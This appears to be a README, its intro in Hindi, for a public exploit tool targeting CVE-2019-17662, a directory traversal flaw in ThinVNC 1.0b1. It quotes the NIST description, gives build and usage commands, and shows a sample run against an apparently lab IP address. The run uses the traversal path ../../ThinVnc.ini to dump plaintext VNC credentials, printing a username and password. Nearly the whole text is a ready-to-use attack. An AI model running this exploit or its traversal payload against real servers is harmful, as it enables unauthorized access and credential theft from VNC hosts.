
CVE-2019-17662 (ThinVNC 1.0b1) के लिए एक्सप्लॉइट
ThinVNC 1.0b1 मनमानी फ़ाइल पढ़ने के लिए संवेदनशील है, जो VNC सर्वर से समझौता करने की ओर ले जाता है। यह भेद्यता तब भी मौजूद होती है जब VNC सर्वर की तैनाती के दौरान प्रमाणीकरण चालू किया गया हो। प्रमाणीकरण के लिए पासवर्ड एक फ़ाइल में स्पष्ट पाठ में संग्रहीत किया जाता है जिसे ../../ThinVnc.ini डायरेक्ट्री ट्रैवर्सल हमला वेक्टर के माध्यम से पढ़ा जा सकता है।
~ NIST
$ git clone https://github.com/whokilleddb/CVE-2019-17662
$ cd CVE-2019-17662
$ make
$ ./bin/CVE-2019-17662 -h
[~] Usage: ./bin/CVE-2019-17662 -u URL [-f File]
[>] Options:
OPTIONS Desciption
-u URL Base URL
-f File [Optional] File Name To Query (Default: ThinVnc.ini)
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] CVE-2019-17662 exploit by @whokilleddb
[o] Target : http://10.10.185.214:8080/
[x] File To Read: ThinVnc.ini
[~] Trying to Read: http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Trying To Fetch Credentials
[-] User=Atlas
[-] Password=H0ldUpTheHe@vens